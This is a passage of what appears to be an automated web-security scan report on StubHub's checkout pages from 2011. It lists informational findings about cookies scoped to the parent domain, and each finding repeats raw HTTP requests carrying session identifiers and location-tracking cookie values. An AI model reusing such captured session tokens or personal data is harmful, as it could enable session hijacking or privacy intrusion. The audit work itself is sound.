Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Thu, 16 Feb 2012 11:42:18 GMT
Cache-Control: max-age=31536000
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEDEEA2639C11039789D94000C1CF856; Path=/; Domain=.stubhub.com


3.19. https://buy.stubhub.com/promotions/scratch/sh/footer_grad.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/sh/footer_grad.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/sh/footer_grad.gif HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Apr 2009 16:32:49 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.a=1297856549180; TLTHID=CF183E4839C11039789E94000C1CF856; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:19 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:19 GMT
Cache-Control: max-age=1800
Set-Cookie: TLTHID=CF560F4839C1103958ADC35B4524558D; Path=/; Domain=.stubhub.com


3.20. https://buy.stubhub.com/promotions/scratch/sh/footer_hands.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/sh/footer_hands.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/sh/footer_hands.gif HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 09 Apr 2009 16:33:18 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.a=1297856549180; TLTHID=CF183E4839C11039789E94000C1CF856; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:19 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:19 GMT
Cache-Control: max-age=1800
Set-Cookie: TLTHID=CF55A4E039C110395C85A19FC1E4C140; Path=/; Domain=.stubhub.com


3.21. https://buy.stubhub.com/promotions/scratch/test/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/test/mbox.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/test/mbox.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 28 Oct 2010 22:25:16 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1599
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CEE393D239C11039317A904AB7E84BF7; Path=/; Domain=.stubhub.com


3.22. https://buy.stubhub.com/promotions/scratch/test/s_code_2011_01_27.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /promotions/scratch/test/s_code_2011_01_27.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promotions/scratch/test/s_code_2011_01_27.js HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Thu, 27 Jan 2011 22:30:08 GMT
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; TLTHID=CDEAF3B239C110395C82A19FC1E4C140

Response

HTTP/1.1 304 Not Modified
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Connection: Keep-Alive
Keep-Alive: timeout=5, max=1600
Expires: Wed, 16 Feb 2011 12:12:18 GMT
Cache-Control: max-age=1800
Vary: Accept-Encoding
Set-Cookie: TLTHID=CF10E41839C11039A5D4871236610E4F; Path=/; Domain=.stubhub.com


3.23. https://buy.stubhub.com/resources/css/stubhub.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /resources/css/stubhub.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resources/css/stubhub.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
If-Modified-Since: Mon, 05 Feb 2007 20:17:13 GMT
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; 